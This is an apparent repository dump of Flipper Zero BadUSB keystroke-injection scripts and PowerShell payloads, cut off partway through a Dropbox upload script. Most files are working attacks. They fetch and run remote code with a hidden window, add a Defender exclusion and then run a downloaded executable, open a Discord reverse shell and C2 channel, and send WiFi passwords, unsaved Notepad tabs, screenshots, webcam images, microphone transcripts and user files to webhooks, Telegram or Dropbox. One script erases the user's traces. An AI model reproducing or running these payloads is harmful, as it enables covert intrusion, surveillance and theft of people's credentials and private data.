REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C $token = 'YOUR_BOT_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Discord-Media-Hog/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y

--------------------------------------------------------------------------------
/Unsaved-Notepad-to-Discord/Notepad-Tabs-to-Discord.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Notepad Tabs to Discord Webhook.
REM Author: @beigeworm
REM Description: In Windows 11 notepad stores unsaved tabs for reopening notepad.... very unsafe.
REM Description: This is a script to find any unsaved notes in notepad and send them to a discord webhook.
REM Target: Windows 11

REM *SETUP*
REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw0nptabstodc | iex
ENTER

--------------------------------------------------------------------------------
/BadUSB-Detect-and-Protect/README.md:
--------------------------------------------------------------------------------
# BAD USB DETECTION AND PROTECTION

**SYNOPSIS**

This script runs passively in the background waiting for any new usb devices.
When a new USB device is connected to the machine this script monitors keypresses for 60 seconds.
If there are 13 or more keypresses detected within 200 milliseconds it will pause all inputs for 20 seconds.

**USAGE**

1. Edit Options below (optional) and Run the script
2. A pop up will appear when monitoring is active and if a 'BadUSB' device is detected
3. Logs are found in 'usblogs' folder in the temp directory.
5. Close the monitor in the system tray

**REQUIREMENTS**

Admin privileges are required for pausing keyboard and mouse inputs

--------------------------------------------------------------------------------
/Download-and-Execute/Download-Execute.txt:
--------------------------------------------------------------------------------
REM Title: Download-Execute from Run Prompt
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses the Run Prompt to download a file and run it.
REM Target: Windows 10

REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:/;Start-Sleep 1;

REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit

CTRL-SHIFT ENTER
DELAY 3000
ALT y

--------------------------------------------------------------------------------
/Pranks/Disable-Keyboard-Mouse-120s.txt:
--------------------------------------------------------------------------------
REM Title: Disable Keyboard and Mouse 120s
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to disable all i/o devices for 120 seconds.
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -W H -Ep Bypass -C $s='[DllImport(\"user32.dll\")][return: MarshalAs(UnmanagedType.Bool)]public static extern bool BlockInput(bool fBlockIt);';Add-Type -M $s -Name U -Names W;[W.U]::BlockInput($true);sleep 120;[W.U]::BlockInput($false)
CTRL-SHIFT ENTER
DELAY 2000
ALT y

--------------------------------------------------------------------------------
/Exfiltrate-to-USB/Exfiltrate-to-USB.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Exfiltrate files USB Drive
REM Author: @beigeworm
REM Description: This script searches the users folder for pictures, documents, logs, PDFs and more, then sends it all to a newly connected USB drive.
REM Target: Windows 10

REM SETUP (optional)
REM Add your USB drive Name in quotes for $driveName
REM Add Y or N in quotes for $Hidden (hides console window)

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -C $driveName = ''; $Hidden = ''; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Exfiltrate-to-USB/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Wallpaper-Jumpscare/main.ps1:
--------------------------------------------------------------------------------
$url = "https://i.ibb.co/XJSPt9s/1.png"
$outputPath = "$env:temp\img.jpg"
$wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched

IWR -Uri $url -OutFile $outputPath

$signature = @'
using System;
using System.Runtime.InteropServices;

public class Wallpaper {
    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
}
'@

Add-Type -TypeDefinition $signature

$SPI_SETDESKWALLPAPER = 0x0014
$SPIF_UPDATEINIFILE = 0x01
$SPIF_SENDCHANGE = 0x02

[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE)

--------------------------------------------------------------------------------
/Tools/Download-Execute from Run Prompt.txt:
--------------------------------------------------------------------------------
REM Title: Download-Execute from Run Prompt
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses the Run Prompt to download a file and run it.
REM Target: Windows 10

REM *SETUP*
REM replace FILE_URL_HERE with the url of your file to run.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;

REM replace FILE_URL_HERE below.
STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit

CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

--------------------------------------------------------------------------------
/Tools/Set US Keyboard & System Language.txt:
--------------------------------------------------------------------------------
REM Title: Set System Language
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to set the Windows system language (example is UK-US).
REM Target: Windows 10

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

REM set system language to (example here is US)
STRING Dism /online /Get-Intl
ENTER
DELAY 500
STRING Set-WinSystemLocale en-US
ENTER
DELAY 500
STRING Set-WinUserLanguageList en-US -force
ENTER
DELAY 500
STRING exit
ENTER

--------------------------------------------------------------------------------
/Pranks/Persisant-Goose.txt:
--------------------------------------------------------------------------------

REM Title: Persistent goose prank.
REM Author: @beigeworm
REM Description: Spawn an annoying goose and replace it if it's killed by the user.
REM Target: Windows 10 and 11

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H
ENTER
DELAY 4000
STRING $url = "https://github.com/beigeworm/assets/raw/main/Goose.zip";$tempFolder = $env:TMP;$zipFile = Join-Path -Path $tempFolder -ChildPath "Goose.zip";$extractPath = Join-Path -Path $tempFolder -ChildPath "Goose";Invoke-WebRequest -Uri $url -OutFile $zipFile;Expand-Archive -Path $zipFile -DestinationPath $extractPath;$vbscript = "$extractPath\Goose.vbs";& $vbscript
ENTER
--------------------------------------------------------------------------------
/Tools/Clean-Command-History.txt:
--------------------------------------------------------------------------------
REM Title: Clean Command History
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Empty the temp folder and recycle bin, clear run box and powershell history.
REM Target: Windows 10
REM Credit: I-Am-Jakoby

REM some setup for dukie script.
DEFAULT_DELAY 100

GUI r
DELAY 750

REM open powershell (add "-W Hidden" to hide the window).
STRING powershell -NoP -NonI -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue ; reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f ; Remove-Item (Get-PSreadlineOption).HistorySavePath ; Clear-RecycleBin -Force -ErrorAction SilentlyContinue
ENTER
DELAY 10000
STRING exit
ENTER

--------------------------------------------------------------------------------
/Discord-C2/Discord C2 Client.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Discord Command And Control.
REM Author: @beigeworm
REM Description: Using a Discord Server Chat and a github text file to Act as a Command and Control Platform.
REM Target: Windows 10 and 11

REM SETUP
REM make a discord bot at https://discord.com/developers/applications/
REM add the bot to your discord server
REM Change BOT_TOKEN below with your bot token
REM Change CHANNEL_ID below to your channel id
REM for more info goto - https://github.com/beigeworm/PoshCord-C2

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bw0dcc2 | iex
ENTER

--------------------------------------------------------------------------------
/Pranks/Kill I-O Devices.txt:
--------------------------------------------------------------------------------
REM Title: beigeworm's Mouse and Keyboard Killer.
REM Author: @beigeworm
REM Description: This script Disables mouse and keyboard input for a number of seconds.
REM Target: Windows 10

REM Setup: Change $WaitTime to desired amount of seconds..

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass
CTRL-SHIFT ENTER
DELAY 2500
ALT y
DELAY 5000

STRING $WaitTime = 60 ;$PNPMice = Get-WmiObject Win32_USBControllerDevice | %{[wmi]$_.dependent} | ?{$_.pnpclass -eq 'Mouse'};$PNPMice.Disable();$PNPKeyboard = Get-WmiObject Win32_USBControllerDevice | %{[wmi]$_.dependent} | ?{$_.pnpclass -eq 'Keyboard'};$PNPKeyboard.Disable();Sleep $WaitTime;$PNPMice.Enable();$PNPKeyboard.Enable();exit
ENTER
--------------------------------------------------------------------------------
/OSINT/Discord WiFi Grabber.txt:
--------------------------------------------------------------------------------

REM Title: Wifi Grabber to Discord
REM Author: @beigeworm
REM Description: Uses Powershell to gather Wifi info and send it via Discord.
REM Target: Windows 10

REM *SETUP*
REM replace YOUR_WEBHOOK_HERE with your discord webhook.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -Exec Bypass
ENTER
DELAY 4000

STRING $w="YOUR_WEBHOOK_HERE";$a=(netsh wlan show profiles) -replace ".*:\s+";foreach ($b in $a) {$s=$b.Trim();$p=(netsh wlan show profiles name=$s key=clear);$l=$p | Select-String "Key Content";if($l){$k=$l -replace "Key Content\s*:\s+","";$o="$s : $k";$j = @{"username" = "$env:COMPUTERNAME" ;"content" = $o} | ConvertTo-Json;irm -Uri $w -Method Post -ContentType "application/json" -Body $j}}
DELAY 500
ENTER

--------------------------------------------------------------------------------
/Netcat-Screenshare/Desktop Screenshare over Netcat.txt:
--------------------------------------------------------------------------------
REM Title: Beigeworm's Screenshare Through Netcat
REM Author: @beigeworm
REM Description: This script connects target computer with a netcat session to send a stream of the desktop to a browser window.
REM Target: Windows 10

REM *SETUP*
REM replace YOUR_IP_HERE with your netcat attacker IP Address.
REM Run script on target Windows system.
REM On a Linux box use this command > nc -lvnp 9000 | nc -lvnp 8080 (Netcat is required)
REM Then in a firefox browser on the Linux box > http://localhost:8080

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ip='YOUR_IP_HERE'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Netcat-Screenshare/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Discord-Reverse-Shell/Discord-Reverse-Shell.txt:
--------------------------------------------------------------------------------

REM Title: beigeworm's Discord Reverse Shell.
REM Author: @beigeworm
REM Description: Using a Discord bot along with discords API to Act as a Powershell Terminal.
REM Target: Windows 10 and 11

REM SETUP
REM make a discord bot at https://discord.com/developers/applications/
REM add the bot to your discord server
REM Change BOT_TOKEN below with your bot token
REM Change CHANNEL_ID below to your channel id
REM for more info goto - https://github.com/beigeworm/PoshCord-C2

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/Discord-Reverse-Shell/main.ps1 | iex
ENTER

--------------------------------------------------------------------------------
/Tools/Base64 Decode & Execute.txt:
--------------------------------------------------------------------------------
REM Title: Base64 Decode & Execute
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Uses Powershell to decode a Base64 string and then execute the file.
REM Target: Windows 10

REM *SETUP*
REM replace all placeholders throughout the script.

REM some setup for dukie script
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window)
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

REM *replace this below*
STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';

STRING $decodedFile = [System.Convert]::FromBase64String($b64);

REM *replace NAME_HERE and desired filetype (example is .exe)*
STRING $File = "NAME_HERE"+".exe";

STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File

--------------------------------------------------------------------------------
/Screen-to-Discord/main.ps1:
--------------------------------------------------------------------------------
$hookurl = "$dc"
$seconds = 30 # Screenshot interval
$a = 1 # Screenshot amount

# shortened URL Detection
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}

While ($a -gt 0){
    $Filett = "$env:temp\SC.png"
    Add-Type -AssemblyName System.Windows.Forms
    Add-type -AssemblyName System.Drawing
    $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $Width = $Screen.Width
    $Height = $Screen.Height
    $Left = $Screen.Left
    $Top = $Screen.Top
    $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
    $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
    $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
    $bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png)
    Start-Sleep 1
    curl.exe -F "file1=@$filett" $hookurl
    Start-Sleep 1
    Remove-Item -Path $filett
    Start-Sleep $seconds
    $a--
}

--------------------------------------------------------------------------------
/Speech-to-Discord/main.ps1:
--------------------------------------------------------------------------------
<#=============================== Speech to Discord ====================================

SYNOPSIS
Uses assembly 'System.Speech' to take audio input and convert to text and then send the text to discord.

SETUP
1. Replace 'YOUR_WEBHOOK_HERE' with your discord webhook

#>

$dc = 'WEBHOOK_HERE' # can be shortened

Add-Type -AssemblyName System.Speech
$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine
$grammar = New-Object System.Speech.Recognition.DictationGrammar
$speech.LoadGrammar($grammar)
$speech.SetInputToDefaultAudioDevice()

while ($true) {
    $result = $speech.Recognize()
    if ($result) {
        $results = $result.Text
        Write-Output $results
        if ($dc.Ln -ne 121){$dc = (irm $dc).url}
        $Body = @{'username' = $env:COMPUTERNAME ; 'content' = $results}
        irm -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)
    }
}

--------------------------------------------------------------------------------
/US-Keyboard-Layout/main.ps1:
--------------------------------------------------------------------------------
<#
powershell -ep bypass -w h -c irm is.gd/3jgz85 | iex
#>

Dism /online /Get-Intl
Set-WinSystemLocale en-US
Set-WinUserLanguageList en-US -force

$languageList = Get-WinUserLanguageList
$usLanguagePack = $languageList | Where-Object LanguageTag -eq 'en-US'
if (-not $usLanguagePack) {
    Write-Host "US English language pack is not installed. Installing..."
    Install-WinUserLanguageList -Language 'en-US'
}

foreach ($language in $languageList) {
    if ($language.LanguageTag -ne 'en-US') {
        Write-Host "Removing language pack: $($language.LanguageTag)"
        $languageList = $languageList | Where-Object LanguageTag -ne $language.LanguageTag
    }
}

if (-not ($languageList | Where-Object LanguageTag -eq 'en-US')) {
    $languageList += [cultureinfo]::GetCultureInfo('en-US')
}

Set-WinUILanguageOverride -Language 'en-US'
Set-WinUserLanguageList -LanguageList $languageList -Force

--------------------------------------------------------------------------------
/BadUSB-Detect-and-Protect/BadUSB-Detect-and-Protect.txt:
--------------------------------------------------------------------------------
REM Title: BadUSB Detect and Protect
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: This script runs passively in the background waiting for any new usb devices.
REM Description: When a new USB device is connected to the machine this script monitors keypresses for 30 seconds.
REM Description: If there are 15 or more keypresses detected within 200 milliseconds it will attempt to disable the most recently connected USB device
REM Description: LOGS are stored in 'usblogs' in 'temp' folder
REM Target: Windows 10

REM *REQUIREMENTS*
REM admin required for disable USB function.

REM some setup for dukie script.
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -Exec Bypass -C irm https://raw.githubusercontent.com/beigew0rm/BadUSB-Files-For-FlipperZero/main/BadUSB-Detect-and-Protect/main.ps1 | iex
CTRL-SHIFT ENTER
DELAY 2500
ALT y

--------------------------------------------------------------------------------
/Webcam-to-Discord/main.ps1:
--------------------------------------------------------------------------------
<#========================== WEBCAM TO DISCORD =============================

SYNOPSIS
download a webcam.dll file, find a webcam and take a picture then send it to discord.

#>

$hookurl = "$dc"
if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url}
$dllPath = Join-Path -Path $env:TEMP -ChildPath "webcam.dll"
if (-not (Test-Path $dllPath)) {
    $url = "https://github.com/beigeworm/assets/raw/main/webcam.dll"
    $webClient = New-Object System.Net.WebClient
    $webClient.DownloadFile($url, $dllPath)
}
Add-Type -Path $dllPath
[Webcam.webcam]::init()
[Webcam.webcam]::select(1)
$imageBytes = [Webcam.webcam]::GetImage()
$tempDir = [System.IO.Path]::GetTempPath()
$imagePath = Join-Path -Path $tempDir -ChildPath "webcam_image.jpg"
[System.IO.File]::WriteAllBytes($imagePath, $imageBytes)
sleep 1
curl.exe -F "file1=@$imagePath" $hookurl | Out-Null
sleep 1
Remove-Item -Path "$env:TEMP\webcam.dll"
Remove-Item -Path $imagePath -Force

--------------------------------------------------------------------------------
/Pranks/Mute-Button-Spam.txt:
--------------------------------------------------------------------------------
REM Title: Rickroll with Max Volume spam
REM Author: @beigeworm
REM Description: Uses Powershell to create a .vbs script to keep volume muted on a loop.
REM Target: Windows 10

REM =============================================================================

REM some setup for dukie script.
LOCALE US
DEFAULT_DELAY 100

REM open powershell (remove -W Hidden to show the window).
GUI r
DELAY 750
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
CONTROL SHIFT ENTER
DELAY 1500
ALT y
DELAY 5000

REM create the .vbs script to keep the volume maxed.
STRING cmd
ENTER
STRING copy con volup.vbs
ENTER
STRING do
ENTER
STRING Set objShell = CreateObject("WScript.Shell")
ENTER
STRING objShell.SendKeys(chr(&hAD))
ENTER
STRING WScript.Sleep 10
ENTER
STRING loop
ENTER
CTRL z
ENTER
STRING start volup.vbs
ENTER
DELAY 1000
STRING exit
ENTER

--------------------------------------------------------------------------------
/OSINT/Speech-to-Discord.txt.txt:
--------------------------------------------------------------------------------
REM Title: Speech to Discord
REM Author: @beigeworm | https://github.com/beigeworm
REM Description: Write a transcript of audio from the mic and send to discord.
REM Target: Windows 10

REM SETUP
REM replace YOUR_WEBHOOK_HERE (below) with your discord webhook.

REM some setup for dukie script.
DEFAULT_DELAY 100

GUI r
DELAY 750

REM open powershell (add "-W Hidden" to hide the window).
16 | STRING powershell -NoP -NonI -Exec Bypass 17 | ENTER 18 | DELAY 5000 19 | 20 | STRING Add-Type -AssemblyName System.Speech;$speech = New-Object System.Speech.Recognition.SpeechRecognitionEngine;$grammar = New-Object System.Speech.Recognition.DictationGrammar;$speech.LoadGrammar($grammar);$speech.SetInputToDefaultAudioDevice();while($true){$result = $speech.Recognize();if ($result) {$results = $result.Text;Write-Output $results;$dc = 'WEBHOOK_HERE';$Body = @{'username' = $env:COMPUTERNAME ; 'content' = $results};irm -ContentType 'Application/Json' -Uri $dc -Method Post -Body ($Body | ConvertTo-Json)}};exit 21 | ENTER 22 | -------------------------------------------------------------------------------- /Pranks/Change-System-Sounds.txt: -------------------------------------------------------------------------------- 1 | REM Title: System Events Sound Changer 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Download any sound and set system event sounds to that file. 
4 | REM Target: Windows 10,11 5 | 6 | REM Change WAV_FILE_URL_HERE to a hosted .wav file online OR define a local file below (all default sounds are in C:/Windows/Media) 7 | REM you can restore default sounds in control panel 8 | 9 | DEFAULT_DELAY 100 10 | 11 | GUI r 12 | DELAY 750 13 | STRING powershell -NoP -NonI -Ep Bypass 14 | ENTER 15 | DELAY 5000 16 | STRING $sound = "C:Windows\Tasks\sound.wav";$URL = iwr -Uri "WAV_FILE_URL_HERE" -OutFile $sound;$eventNames = @("WindowsUAC", "DeviceDisconnect", "DeviceConnect", "Notification.Default", "Maximize", "Minimize", "Open", "Close", "MenuPopup", "SystemNotification") ;foreach ($eventName in $eventNames) {$KeyPath = "HKCU:\AppEvents\Schemes\Apps\.Default\$eventName\.Current";New-Item -Path $KeyPath -Force | Out-Null;Set-ItemProperty -Path $KeyPath -Name "(Default)" -Value $sound -Force};exit 17 | DELAY 500 18 | ENTER 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /Pranks/USB-SoundSwap.txt: -------------------------------------------------------------------------------- 1 | REM Title: USB device sound swapper 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Swaps the USB Device connect and disconnect sounds. 4 | REM Target: Windows 10,11 5 | 6 | REM you can restore default sounds by running script again. 
7 | 8 | DEFAULT_DELAY 100 9 | 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -Ep Bypass 13 | ENTER 14 | DELAY 5000 15 | STRING $Connect = "C:\Windows\media\Windows Hardware Insert.wav";$Disconnect = "C:\Windows\media\Windows Hardware Remove.wav";$Path1 = "HKCU:\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current";$Path2 = "HKCU:\AppEvents\Schemes\Apps\.Default\DeviceConnect\.Current";$Which = Get-ItemProperty -Path $Path1 -Name "(Default)";if ($Which.'(default)' -eq $Connect){Set-ItemProperty -Path $Path1 -Name "(Default)" -Value $Disconnect -Force;Set-ItemProperty -Path $Path2 -Name "(Default)" -Value $Connect -Force}else{Set-ItemProperty -Path $Path1 -Name "(Default)" -Value $Connect -Force;Set-ItemProperty -Path $Path2 -Name "(Default)" -Value $Disconnect -Force};exit 16 | DELAY 500 17 | ENTER 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Screen-to-Telegram/main.ps1: -------------------------------------------------------------------------------- 1 | 2 | $seconds = 30 # Screenshot interval 3 | $a = 1 # Sceenshot amount 4 | 5 | $Token = "$tg" 6 | $URL='https://api.telegram.org/bot{0}' -f $Token 7 | while($chatID.length -eq 0){ 8 | $updates = Invoke-RestMethod -Uri ($url + "/getUpdates") 9 | if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] 10 | if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} 11 | Sleep 10 12 | } 13 | 14 | While ($a -gt 0){ 15 | 16 | Add-Type -AssemblyName System.Windows.Forms 17 | $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen 18 | $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height 19 | $graphics = [System.Drawing.Graphics]::FromImage($bitmap) 20 | $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size) 21 | $filePath = "$env:temp\sc.png" 22 | $bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png) 23 | $graphics.Dispose() 24 | $bitmap.Dispose() 25 | 26 | curl.exe 
-F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null 27 | Remove-Item -Path $filePath 28 | 29 | Start-Sleep $seconds 30 | $a-- 31 | } 32 | -------------------------------------------------------------------------------- /Pranks/Invoke Fake Update (.vbs).txt: -------------------------------------------------------------------------------- 1 | REM Title: Invoke Fake Windows Update 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to create a .vbs script to open Chrome and fullscreen. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 200 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM create the .vbs script to start chrome and go fullscreen. 19 | STRING cmd 20 | ENTER 21 | STRING cd $env:temp 22 | ENTER 23 | STRING copy con update.vbs 24 | ENTER 25 | STRING Set WshShell = WScript.CreateObject("WScript.Shell") 26 | ENTER 27 | STRING WshShell.Run "chrome.exe -new--window -kiosk https://fakeupdate.net/win8", 1, False 28 | ENTER 29 | STRING WshShell.Run "C:\Windows\System32\scrnsave.scr /s" 30 | ENTER 31 | STRING WScript.Sleep 200 32 | ENTER 33 | STRING WshShell.SendKeys "{F11}" 34 | ENTER 35 | CTRL z 36 | ENTER 37 | STRING start update.vbs 38 | ENTER 39 | DELAY 1000 40 | STRING exit 41 | ENTER 42 | DELAY 1000 43 | 44 | 45 | -------------------------------------------------------------------------------- /Pranks/Dsktop Shortcut Spammer.txt: -------------------------------------------------------------------------------- 1 | REM Title: Dsktop Shortcut Spammer 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to generate a specified amount of shortcuts on the desktop. 
4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM *replace 200 with the number of shortcuts you want to create.* 19 | STRING $n = 200;$i = 0;while($i -lt $n){;$num = Get-Random;$Location = "C:\Windows\System32\rundll32.exe" 20 | 21 | REM rest of the script. 22 | STRING ;$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") 23 | STRING ;$Shortcut.TargetPath = $Location;$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll";$Shortcut.IconLocation = "hotplug.dll,0" 24 | STRING ;$Shortcut.Description ="Device Removal";$Shortcut.WorkingDirectory ="C:\Windows\System32";$Shortcut.Save();Start-Sleep -Milliseconds 10;$i++};sleep 10;exit 25 | -------------------------------------------------------------------------------- /Pranks/Rickroll with Max Volume spam.txt: -------------------------------------------------------------------------------- 1 | REM Title: Rickroll with Max Volume spam 2 | REM Author: @beigeworm | https://github.com/beigeworm 3 | REM Description: Uses Powershell to create a .vbs script to keep volume maximised and opens youtube for rickroll. 4 | REM Target: Windows 10 5 | 6 | REM some setup for dukie script. 7 | DEFAULT_DELAY 100 8 | 9 | REM open powershell (remove -W Hidden to show the window). 10 | GUI r 11 | DELAY 750 12 | STRING powershell -NoP -NonI -W Hidden -Exec Bypass 13 | CTRL-SHIFT ENTER 14 | DELAY 1500 15 | ALT y 16 | DELAY 5000 17 | 18 | REM create the .vbs script to keep the volume maxed. 
19 | STRING cmd 20 | ENTER 21 | STRING copy con volup.vbs 22 | ENTER 23 | STRING do 24 | ENTER 25 | STRING Set WshShell = CreateObject("WScript.Shell") 26 | ENTER 27 | STRING WshShell.SendKeys(chr(&hAF)) 28 | ENTER 29 | STRING WScript.Sleep 10 30 | ENTER 31 | STRING loop 32 | ENTER 33 | CTRL z 34 | ENTER 35 | STRING start volup.vbs 36 | ENTER 37 | DELAY 1000 38 | STRING exit 39 | ENTER 40 | DELAY 1000 41 | 42 | REM start Microsoft Edge and open YouTube with Rick Astley - Never Gonna Give You Up. 43 | GUI r 44 | DELAY 1000 45 | STRING msedge.exe --new-window -kiosk https://www.youtube.com/watch?v=dQw4w9WgXcQ 46 | ENTER 47 | DELAY 2000 48 | STRING f 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /Exfiltrate-to-Dropbox/main.ps1: -------------------------------------------------------------------------------- 1 | $accessToken = "$db" 2 | $localFolderPath = "$env:USERPROFILE" 3 | 4 | $computerName = "$env:COMPUTERNAME" 5 | $computerNameAsString = $computerName.ToString() 6 | $dropboxCreateFolderUrl = "https://api.dropboxapi.com/2/files/create_folder_v2" 7 | 8 | $dropboxFolderPath = $computerName.ToString() 9 | $dropboxUploadUrl = "https://content.dropboxapi.com/2/files/upload" 10 | 11 | $headers = @{ 12 | "Authorization" = "Bearer $accessToken" 13 | "Content-Type" = "application/octet-stream" 14 | } 15 | $body = @{ 16 | "path" = "/$computerName" 17 | "autorename" = $true 18 | } | ConvertTo-Json 19 | 20 | $files = Get-ChildItem -Path $localFolderPath -Include "*.docx","*.txt","*.pdf","*.jpg","*.png" -Recurse 21 | 22 | foreach ($file in $files) { 23 | $relativePath = $file.FullName.Replace($localFolderPath, '').TrimStart('\') 24 | $dropboxFilePath = "$dropboxFolderPath/$relativePath".Replace('\', '/') 25 | $headers["Dropbox-API-Arg"] = "{`"path`": `"/$dropboxFilePath`", `"mode`": `"add`", `"autorename`": true, `"mute`": false}" 26 | try { 27 | $fileBytes = [System.IO.File]::ReadAllBytes($file.FullName) 28 | $response = 
